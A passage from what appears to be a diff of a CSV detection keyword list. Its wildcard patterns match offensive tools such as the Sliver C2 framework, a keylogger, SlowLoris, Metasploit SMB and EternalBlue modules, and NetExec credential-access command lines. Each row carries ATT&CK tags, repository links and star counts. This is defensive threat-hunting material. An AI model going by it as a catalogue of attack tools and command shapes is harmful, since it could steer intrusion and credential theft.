TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver.sh/install*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver/.sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver:sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver_pcap_parser.py*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-client_linux*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-client_macos*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-client_windows.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-dns*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*SliverKeylogger*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" -"*sliverpb*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-server daemon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*sliver-server.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*SlowLoris*","offensive_tool_keyword","SlowLoris","Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this","T1498 - T1496 - T1490","TA0002 - TA0004 - TA0007","N/A","N/A","DDOS","https://github.com/gkbrk/slowloris","1","1","N/A","N/A","10","2169","671","2023-05-05T19:21:29Z","2015-04-26T10:00:33Z" -"*slowloris.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Sliver C2 Session*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver.service*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver.sh/install*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver/.sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver:sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver_pcap_parser.py*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_linux*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_macos*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-client_windows.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-dns*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*SliverKeylogger*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*sliverpb*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-server daemon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*sliver-server.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*SlowLoris*","offensive_tool_keyword","SlowLoris","Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this","T1498 - T1496 - T1490","TA0002 - TA0004 - TA0007","N/A","N/A","DDOS","https://github.com/gkbrk/slowloris","1","1","N/A","N/A","10","2172","671","2023-05-05T19:21:29Z","2015-04-26T10:00:33Z" +"*slowloris.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SluiEOP.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*smartbrute *kerberos*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*SmashedPotato.cs*","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","81","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" "*SmashedPotato.exe*","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","81","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z" -"*smb * -u * -p * * -M bh_owned*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*smb * -u * -p * -M ioxidresolver*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*smb * -u * -p * * -M bh_owned*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*smb * -u * -p * -M ioxidresolver*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*smb.dcsync*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" -"*smb/impacket*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb/relay/ntlm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_doublepulsar_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumshares*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumshares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumusers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_enumusers_domain.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_eternalblue*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*smb_ms17_010_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*smb_pipename_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 